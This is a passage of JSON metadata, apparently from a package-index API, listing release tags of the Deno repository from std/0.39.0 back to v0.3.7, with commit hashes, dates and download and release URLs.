Hub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","t